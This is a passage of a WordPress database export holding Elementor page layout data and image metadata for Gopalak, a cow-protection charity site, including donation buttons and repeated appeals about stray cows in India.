typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9629,1619,'_elementor_page_assets','a:0:{}'),(9640,1624,'_edit_lock','1665480932:1'),(9641,1624,'_elementor_edit_mode','builder'),(9642,1624,'_elementor_template_type','wp-page'),(9643,1624,'_elementor_version','3.7.8'),(9644,1624,'_edit_last','1'),(9645,1624,'_wp_page_template','fp-landing-template.php'),(9646,1624,'_elementor_data','[]'),(9647,1624,'_elementor_page_assets','a:0:{}'),(9648,1626,'_edit_lock','1665984931:1'),(9649,1626,'_elementor_edit_mode','builder'),(9650,1626,'_elementor_template_type','wp-page'),(9651,1626,'_elementor_version','3.7.8'),(9652,1626,'_edit_last','1'),(9653,1628,'_wp_attached_file','2022/10/Contribute-1234.png'),(9654,1628,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1263;s:6:\"height\";i:500;s:4:\"file\";s:27:\"2022/10/Contribute-1234.png\";s:8:\"filesize\";i:143197;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"Contribute-1234-300x119.png\";s:5:\"width\";i:300;s:6:\"height\";i:119;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:42687;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"Contribute-1234-1024x405.png\";s:5:\"width\";i:1024;s:6:\"height\";i:405;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:402113;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"Contribute-1234-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:22255;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"Contribute-1234-768x304.png\";s:5:\"width\";i:768;s:6:\"height\";i:304;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:229683;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:27:\"Contribute-1234-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:85696;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:25:\"Contribute-1234-50x20.png\";s:5:\"width\";i:50;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2218;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:27:\"Contribute-1234-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10902;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:25:\"Contribute-1234-48x19.png\";s:5:\"width\";i:48;s:6:\"height\";i:19;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2073;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:25:\"Contribute-1234-48x19.png\";s:5:\"width\";i:48;s:6:\"height\";i:19;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2073;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9655,1626,'_wp_page_template','default'),(9656,1626,'_elementor_data','[{\"id\":\"3d9de82\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\"},\"elements\":[{\"id\":\"5605bb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"eeb943c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"-55\",\"right\":\"-12\",\"bottom\":\"0\",\"left\":\"-25\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b1e0e0a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1e51603\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d48ab42\",\"elType\":\"widget\",\"settings\":{\"text\":\"Donate\",\"align\":\"center\",\"background_color\":\"#2A3F2D\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/campaigns\\/cattle-feed\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49e13ac\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fe61f38\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"8c33583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(9657,1626,'_elementor_page_assets','a:0:{}'),(9660,1626,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(9663,1629,'_elementor_edit_mode','builder'),(9664,1629,'_elementor_template_type','wp-page'),(9665,1629,'_elementor_version','3.7.8'),(9666,1629,'_wp_page_template','default'),(9667,1629,'_elementor_data','[{\"id\":\"3d9de82\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5605bb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"eeb943c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\",\"id\":1628,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"-55\",\"right\":\"-12\",\"bottom\":\"0\",\"left\":\"-25\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49e13ac\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fe61f38\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"8c33583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(9668,1629,'_elementor_page_assets','a:0:{}'),(9669,1629,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(9671,1630,'_elementor_edit_mode','builder'),(9672,1630,'_elementor_template_type','wp-page'),(9673,1630,'_elementor_version','3.7.8'),(9674,1630,'_wp_page_template','default'),(9675,1630,'_elementor_data','[{\"id\":\"3d9de82\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5605bb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"eeb943c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\",\"id\":1628,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"-55\",\"right\":\"-12\",\"bottom\":\"0\",\"left\":\"-25\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49e13ac\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fe61f38\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"8c33583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(9676,1630,'_elementor_page_assets','a:0:{}'),(9677,1630,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(9679,1631,'_elementor_edit_mode','builder'),(9680,1631,'_elementor_template_type','wp-page'),(9681,1631,'_elementor_version','3.7.8'),(9682,1631,'_wp_page_template','default'),(9683,1631,'_elementor_data','[{\"id\":\"3d9de82\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5605bb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"eeb943c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\",\"id\":1628,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"-55\",\"right\":\"-12\",\"bottom\":\"0\",\"left\":\"-25\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b1e0e0a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1e51603\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d48ab42\",\"elType\":\"widget\",\"settings\":{\"text\":\"Donate\",\"align\":\"center\",\"background_color\":\"#2A3F2D\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49e13ac\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fe61f38\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"8c33583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(9684,1631,'_elementor_page_assets','a:0:{}'),(9685,1631,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(9688,1632,'_elementor_edit_mode','builder'),(9689,1632,'_elementor_template_type','wp-page'),(9690,1632,'_elementor_version','3.7.8'),(9691,1632,'_wp_page_template','elementor_canvas'),(9692,1632,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"taiowc-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"b